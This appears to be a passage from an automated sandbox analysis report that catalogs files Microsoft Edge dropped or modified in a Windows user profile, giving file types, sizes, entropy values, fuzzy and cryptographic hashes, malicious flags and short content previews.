SSDEEP:	6:BMyXbD1923oH+Tcwtk2WwnvB2KLlrMyXbUyq2P923oH+Tcwtk2WwnvIFUv:3XSYebkxwnvFL/X9v4YebkxwnQFUv
MD5:	57242E2AB41E3973EBECB473AA6DF164
SHA1:	CD65455DCECA27E8035317A000AECBE1752FBEA7
SHA-256:	A2A3B2891BCDC9ED5076FF5246DE4CC1862076EC37752CCB21547B220512BD95
SHA-512:	1F046AAD2003584D77201A999DA2C3D19517B5B936F7D44A60CE4A0AF09EC5F5CCB240F08038A766C3968F1E84B2D1DF7694E42DEE82EB30B7B9F9E323E8C19F
Malicious:	false
Preview:	2024/07/26-14:10:22.288 2510 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/07/26-14:10:22.621 2510 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	374811
Entropy (8bit):	5.396165949579221
Encrypted:	false
SSDEEP:	6144:dWLgimLVvUrsc6rRA81b/18jyJNjfvrfM6Rc:cLBgAg1zfv0
MD5:	6DAFAC2A33DBBC70C0C4895EFF720CD9
SHA1:	66E6BC4E7C704FD3837261B8887C54F2DF95A316
SHA-256:	CC5437572370FFF78B46B38FC27A0A410B4F5B8C08C28AD2A62420624D191944
SHA-512:	4A2560AE8D00A053165D9482CF1DA87B6EE2A64C62AAED23E8DF7866146D9E924EADD0FB434F87F3D10125DECE0352A1FA78A6200A694807CE2D883E208A13BE
Malicious:	false
Preview:	{"aee_config":{"ar":{"price_regex":{"ae":"(((ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)))","dz":"(((dzd\|da\|\\x{062F}\\x{062C})\\s\\d{1,3})\|(\\d{1,3}\\s(dzd\|da\|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}\|egp)\\s\\d{1,3})\|(\\d{1,3}\\s(e\\x{00a3}\|egp)))","ma":"(((mad\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(mad\|dhs\|dh)))","sa":"((\\d{1,3}\\s(sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633}))\|((sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633})\\s\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})\|(\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})\|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})\|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.121422477458604
Encrypted:	false
SSDEEP:	6:BMykq3+q2P923oH+Tcwt8aPrqIFUt84Myuum5Zmw+4MyuumtVkwO923oH+Tcwt8h:3kqOv4YebL3FUt8iS/+ie5LYebQJ
MD5:	FA690DBF90DFB1FF8C7A92B70C04A7B5
SHA1:	32E29736AADC7DC763F23B2564CBA3B3CC6FF20A
SHA-256:	4597F88238F4F5BDC3B346E84626195F5448746BF4783C47A71DFC295EB3EED4
SHA-512:	B5F40D67C6908C3B2EF8F47662D78EDA032C6AE501D7F8237FF7CEA33CCF9557103A43B4EEC450E24F237BBF328FD8806878038095BC2BF740440DBC6F5BF2BA
Malicious:	false
Preview:	2024/07/26-14:10:11.701 14e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/07/26-14:10:11.702 14e8 Recovering log #3.2024/07/26-14:10:11.702 14e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.121422477458604
Encrypted:	false
SSDEEP:	6:BMykq3+q2P923oH+Tcwt8aPrqIFUt84Myuum5Zmw+4MyuumtVkwO923oH+Tcwt8h:3kqOv4YebL3FUt8iS/+ie5LYebQJ
MD5:	FA690DBF90DFB1FF8C7A92B70C04A7B5
SHA1:	32E29736AADC7DC763F23B2564CBA3B3CC6FF20A
SHA-256:	4597F88238F4F5BDC3B346E84626195F5448746BF4783C47A71DFC295EB3EED4
SHA-512:	B5F40D67C6908C3B2EF8F47662D78EDA032C6AE501D7F8237FF7CEA33CCF9557103A43B4EEC450E24F237BBF328FD8806878038095BC2BF740440DBC6F5BF2BA
Malicious:	false
Preview:	2024/07/26-14:10:11.701 14e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/07/26-14:10:11.702 14e8 Recovering log #3.2024/07/26-14:10:11.702 14e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.161917246229931
Encrypted:	false
SSDEEP:	6:BMyoV+q2P923oH+Tcwt865IFUt84MyjZmw+4MyTVkwO923oH+Tcwt86+ULJ:3ogv4Yeb/WFUt8ij/+i55LYeb/+SJ
MD5:	22B89C5F6C0559DBB2BC616A9FE6FD51
SHA1:	FB3AC3AAB66DB0C8AEB64D863520F5C852B8A2EC
SHA-256:	6A70255C09017F9BA9026BF59279084D617C57A99654D8CD554354CB09BF202A
SHA-512:	B85F55CE73956B2AFA46DE6092B64D247A2D34A127E17C9613DDC92A1BB921E62B9A9C3CF0390F5874139A26EA058027CBD9DC8D3DE28E9C3432D1A1AE4A4460
Malicious:	false
Preview:	2024/07/26-14:10:11.704 14e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/07/26-14:10:11.705 14e8 Recovering log #3.2024/07/26-14:10:11.705 14e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.161917246229931
Encrypted:	false
SSDEEP:	6:BMyoV+q2P923oH+Tcwt865IFUt84MyjZmw+4MyTVkwO923oH+Tcwt86+ULJ:3ogv4Yeb/WFUt8ij/+i55LYeb/+SJ
MD5:	22B89C5F6C0559DBB2BC616A9FE6FD51
SHA1:	FB3AC3AAB66DB0C8AEB64D863520F5C852B8A2EC
SHA-256:	6A70255C09017F9BA9026BF59279084D617C57A99654D8CD554354CB09BF202A
SHA-512:	B85F55CE73956B2AFA46DE6092B64D247A2D34A127E17C9613DDC92A1BB921E62B9A9C3CF0390F5874139A26EA058027CBD9DC8D3DE28E9C3432D1A1AE4A4460
Malicious:	false
Preview:	2024/07/26-14:10:11.704 14e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/07/26-14:10:11.705 14e8 Recovering log #3.2024/07/26-14:10:11.705 14e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
MD5:	826B4C0003ABB7604485322423C5212A
SHA1:	6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
SHA-256:	C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
SHA-512:	0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.118178369456525
Encrypted:	false
SSDEEP:	6:BMykdUy3+q2P923oH+Tcwt8NIFUt84MykdUUIZZmw+4MykdUUINVkwO923oH+TcN:3kH3+v4YebpFUt8ikw/+ikgV5LYebqJ
MD5:	979AF47CFFCA5CC00167314EA82EFD48
SHA1:	090662426902AA50740E146667FC9AEB5BEF10F2
SHA-256:	227C7E8054BEABBF0C443C06DAA0B34B706B78DF9C98E8167AAE533F9000F7AA
SHA-512:	F29EEF7483EAEAD8E6C3348646C95D69EC3C78D1FFC8908A1537BA692B27E01F5D14973C24194755C33311C7FA52BE1823772B688E4AA3356A5384023B909024
Malicious:	false
Preview:	2024/07/26-14:10:12.810 107c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/07/26-14:10:12.811 107c Recovering log #3.2024/07/26-14:10:12.811 107c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.118178369456525
Encrypted:	false
SSDEEP:	6:BMykdUy3+q2P923oH+Tcwt8NIFUt84MykdUUIZZmw+4MykdUUINVkwO923oH+TcN:3kH3+v4YebpFUt8ikw/+ikgV5LYebqJ
MD5:	979AF47CFFCA5CC00167314EA82EFD48
SHA1:	090662426902AA50740E146667FC9AEB5BEF10F2
SHA-256:	227C7E8054BEABBF0C443C06DAA0B34B706B78DF9C98E8167AAE533F9000F7AA
SHA-512:	F29EEF7483EAEAD8E6C3348646C95D69EC3C78D1FFC8908A1537BA692B27E01F5D14973C24194755C33311C7FA52BE1823772B688E4AA3356A5384023B909024
Malicious:	false
Preview:	2024/07/26-14:10:12.810 107c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/07/26-14:10:12.811 107c Recovering log #3.2024/07/26-14:10:12.811 107c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	429
Entropy (8bit):	5.809210454117189
Encrypted:	false
SSDEEP:	6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
MD5:	5D1D9020CCEFD76CA661902E0C229087
SHA1:	DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
SHA-256:	B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
SHA-512:	5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 14, cookie 0x8, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	3.0161472576111215
Encrypted:	false
SSDEEP:	192:aSZusHXzCJPo1iTMAOYl7GFte9GWOY0QW:9vHXKiiT5OYY6OYs
MD5:	B21FEFB6CC73F53A00221CEEAC8ABB14
SHA1:	9E63C000E63836BC3433DF9C8F2788D297F47EE9
SHA-256:	972F45C443C15980BBB508427F7ED3360C88C617DEC0532C915F8B7EFE96C1E8
SHA-512:	9C0B4C2690EBEA2B52C9BC0BF153DE9A10D94AF43C56E75CB4CAE36C9A24C80F8FBAC849A00298337E51A78CA51699B64F695364498C0619B85D18FC46793596
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g....._.c...~.2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s...;+...indexfavicon_bitmaps_icon_idfavico

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	1.0169282471678611
Encrypted:	false
SSDEEP:	192:7iMPvpGYOYinPU1idGzzhH+bDo3iN0Z2TVJkXBBE3ybxIreP5GAOYe:ZOYinPU1idGzzhIU3iGAIBBE3qxIQOYe
MD5:	75E3139E3CACC891D3EA81624AD7E527
SHA1:	3FDD20D23BC990056DB8355FCE11B6401E1B769A
SHA-256:	84E64E13D2311CCAEE419EE7BFA45D609208810EB003E92AD38713B66FA0F6FC
SHA-512:	AAFDFE3C6AC8A4B6C68E9EC90289B238317754CB5B8360BC9D81D6E47BE0F6725FE56EE5A3176AE3EF195301E97CC99B135D7F68320E8A8AB83FB04456A58BBA
Malicious:	true
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 11, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	45056
Entropy (8bit):	3.918414601255008
Encrypted:	false
SSDEEP:	384:jj9P0PQkQerkjly773pLDcIgam6IkP/Kbt/RKToaADhf:jdUe2mly7O/UP/iRKc39
MD5:	5AB92321902A0ABFA27D09411BAC43DB
SHA1:	26F9287A309CEC9D52CF6BA78E1EC8A2CAC71DB6
SHA-256:	EE4D9D5BBE4C844F47CCFE3909E15AE2FC4FAC945DC279969F93CF94ACA58C95
SHA-512:	971AFC8CD4F487D0FA8C4B0318C4443192B6FFE7EE2E51B204F3D66A6212746436DDCD00B22F116741EED02FFF4D99BD1D349B37C8F70687E791DE9E1CAF2E80
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	408
Entropy (8bit):	5.264280550611038
Encrypted:	false
SSDEEP:	12:3HAjv4Yeb8rcHEZrELFUt8iHAW/+iHAq5LYeb8rcHEZrEZSJ:3gj4Yeb8nZrExg8igag0LYeb8nZrEZe
MD5:	56B06FBB5F2477257389415C42AB1C11
SHA1:	862101BD4D9B0776FCA5BEE29841D32486DA519C
SHA-256:	0EE3C2CF95A09F75AA1719279A13D59E2F2EFCE11B1EA4A42B6FFA27B029A4CF
SHA-512:	821C9337EEDFE3497EB40AF183A619A50B4AA2F51339FDFA99FD9B356F135599A6618605125374217B86C894346790A99E91B11B63F0823E719C4E73F6998BB7
Malicious:	false
Preview:	2024/07/26-14:10:18.414 1834 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/07/26-14:10:18.414 1834 Recovering log #3.2024/07/26-14:10:18.414 1834 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	408
Entropy (8bit):	5.264280550611038
Encrypted:	false
SSDEEP:	12:3HAjv4Yeb8rcHEZrELFUt8iHAW/+iHAq5LYeb8rcHEZrEZSJ:3gj4Yeb8nZrExg8igag0LYeb8nZrEZe
MD5:	56B06FBB5F2477257389415C42AB1C11
SHA1:	862101BD4D9B0776FCA5BEE29841D32486DA519C
SHA-256:	0EE3C2CF95A09F75AA1719279A13D59E2F2EFCE11B1EA4A42B6FFA27B029A4CF
SHA-512:	821C9337EEDFE3497EB40AF183A619A50B4AA2F51339FDFA99FD9B356F135599A6618605125374217B86C894346790A99E91B11B63F0823E719C4E73F6998BB7
Malicious:	false
Preview:	2024/07/26-14:10:18.414 1834 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/07/26-14:10:18.414 1834 Recovering log #3.2024/07/26-14:10:18.414 1834 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.133985971801103
Encrypted:	false
SSDEEP:	6:BMykAd43+q2P923oH+Tcwt8a2jMGIFUt84Mykv5Zmw+4MykKjVkwO923oH+Tcwtw:3k44Ov4Yeb8EFUt8ikx/+ikKp5LYeb8N
MD5:	4F540C4BC1502E432CD6A4E26DA7CFA4
SHA1:	BA0AA2FC1251B249238BA64A167E5957DC9C927C
SHA-256:	CD99D6A13FF698736561897AD496DD919B4DD7C0C84FF58EC04B5313DC9F90B3
SHA-512:	720DCFF9B320503731AC1CB956193ED7EF8BE235DA38446963511F9009BB33D0B46579A3743753D15FF166D2ACDB1DE4A98759D48CCE3470D68042DE75F12F18
Malicious:	false
Preview:	2024/07/26-14:10:12.141 18e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/07/26-14:10:12.143 18e8 Recovering log #3.2024/07/26-14:10:12.146 18e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.133985971801103
Encrypted:	false
SSDEEP:	6:BMykAd43+q2P923oH+Tcwt8a2jMGIFUt84Mykv5Zmw+4MykKjVkwO923oH+Tcwtw:3k44Ov4Yeb8EFUt8ikx/+ikKp5LYeb8N
MD5:	4F540C4BC1502E432CD6A4E26DA7CFA4
SHA1:	BA0AA2FC1251B249238BA64A167E5957DC9C927C
SHA-256:	CD99D6A13FF698736561897AD496DD919B4DD7C0C84FF58EC04B5313DC9F90B3
SHA-512:	720DCFF9B320503731AC1CB956193ED7EF8BE235DA38446963511F9009BB33D0B46579A3743753D15FF166D2ACDB1DE4A98759D48CCE3470D68042DE75F12F18
Malicious:	false
Preview:	2024/07/26-14:10:12.141 18e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/07/26-14:10:12.143 18e8 Recovering log #3.2024/07/26-14:10:12.146 18e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\MediaDeviceSalts

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 6, cookie 0x3, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	0.40473191338701875
Encrypted:	false
SSDEEP:	24:TLiCwbvwsw9VwLwcORslcDw3wJ6UwccI5fB5Ilp9ds:TxKX0wxORAmA/U1cEB5I1ds
MD5:	8530B6383672B71EB11C138CC8A3C9E7
SHA1:	7EEC3535D015E0BA232EE1AA58E4BE5F5F9483AF
SHA-256:	0EE10625F42339149724CCFC22BD97A42D68D5CAB80FD8C0D2AC4C1BBCEC9AB7
SHA-512:	733F0834870AE8E50D764ACA7A5C28DFA88C656F92A84E364531D394B3A3B5E5C16912F962819967D4E420AA686733259967FA05E3A055854EB898930033E1B9
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...p."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network Action Predictor

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 4
Category:	modified
Size (bytes):	45056
Entropy (8bit):	0.4828000225491071
Encrypted:	false
SSDEEP:	48:TWo9n+8dv/qALihje9kqL42WOT/9FGXHXoNqw4kDofQbaK:b9n+8d3qAuhjspnWOvGXHLg
MD5:	53326FEF2521E98910609A3302E3A137
SHA1:	30C1F56E5CBCAB36EFB8611FAC822995EF6DE387
SHA-256:	54189273D5089421C8398C0B602B1E50DE69826CBC2031C906CCFD3BC229C743
SHA-512:	F9A7BD009D8F8258C17587959B19560DEF250D4D15D19B1C17F822E569F9DE704FAE94D5A916A23112C41F0E5F253896364B8CE2EC0A9FEDF4919CAB669B696E
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......=......\.t.+.>...,...=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

